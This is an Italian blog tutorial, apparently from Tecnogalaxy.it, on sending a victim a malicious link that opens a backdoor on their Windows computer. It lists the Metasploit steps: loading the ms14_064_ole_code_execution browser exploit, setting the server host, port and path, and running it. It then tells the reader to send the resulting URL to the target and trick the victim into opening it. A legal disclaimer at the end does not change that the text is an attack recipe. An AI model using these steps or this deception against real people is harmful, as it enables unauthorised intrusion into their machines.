Nei precedenti articoli abbiamo discusso su come generare un link maligno per creare una backdoor nel computer vittima, oggi vedremo sempre come iniettare una backdoor attraverso un link, un argomento per lo meno simile al precedente, ma con caratteristiche diverse; il metodo è sempre lo stesso, ovvero quello di riuscire a creare un ponte di comunicazione segreto tra il target e il nostro PC; ai giorni di oggi questo è il principale metodo utilizzato dagli hacker della cosidetta “fascia intermedia”, in quanto, come andremo a vedere nei futuri articoli, queste sono solamente le basi per poi dirigere attacchi più cordinati, difficili e funzionanti. Andiamo subito a vedere come procedere per portare a termine la creazioni di questo link da inviare alla nostra vittima. Innanzitutto per svolgere tutte queste operazioni dovete avere in possesso Kali Linux; successivamente aprite un nuovo terminale e digitate il solito comando “msfconsole”, che richiamerà la console di Metasploit, una delle più utilizzate per questo genere di attacchi e per la sua efficienza.

Iniettare una backdoor attraverso un link

 

 

 

 

 

Bene, una volta che msfconsole si sarà avviata possiamo procedere con una serie di comandi:

– use exploit/windows/browser/ms14_064_ole_code_execution

Iniettare una backdoor attraverso un link

 

 

 

 

 

-set SRVHOST “indirizzo IP locale”

Iniettare una backdoor attraverso un link

 

 

 

 

 

-set SRVPORT “porta locale”

Iniettare una backdoor attraverso un link

 

 

 

 

 

-set uripath /

Iniettare una backdoor attraverso un link

 

 

 

 

 

-exploit

niettare una backdoor attraverso un link

 

 

 

 

 

Adesso ci troviamo nel punto cruciale dell’attacco; dopo l’ultimo comando che abbiamo digitato, ovvero exploit, ci sono comparse delle scritte (quelle precedute dall’asterisco blu) ma quella utile a noi è la penultima ovvero “Using URL: https://192.168.1.100:443/”; dovremo copiarla e inviarla al computer sotto attacco, facendo attenzione ad ingannare bene la vittima; in fondo si tratta di cascare in un vero e proprio tranello, in questo caso molto pericoloso.

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).